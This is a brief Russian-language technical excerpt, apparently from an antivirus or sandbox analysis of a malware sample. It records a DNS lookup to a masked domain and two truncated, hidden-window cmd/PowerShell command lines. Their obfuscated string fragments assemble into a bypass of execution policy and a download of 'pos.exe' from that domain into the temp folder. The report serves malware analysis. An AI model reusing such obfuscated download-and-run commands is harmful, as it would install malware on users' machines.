Техническая информация
- DNS ASK ch###eskolz.com
- '<SYSTEM32>\cmd.exe' /c "powershell $bike='^ope Proces';$quot='^temp+''\pos.exe'');';$f163='^Se';$we='^oadFile(''http';$Ends='^olz.com/';$ish='^.gi';$Jazz='^h';$free='^t-ExecutionPolicy B';$wish='^ient).Downl';$di...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell $bike='^ope Proces';$quot='^temp+''\pos.exe'');';$f163='^Se';$we='^oadFile(''http';$Ends='^olz.com/';$ish='^.gi';$Jazz='^h';$free='^t-ExecutionPolicy B';$wish='^ient).Downl';$di...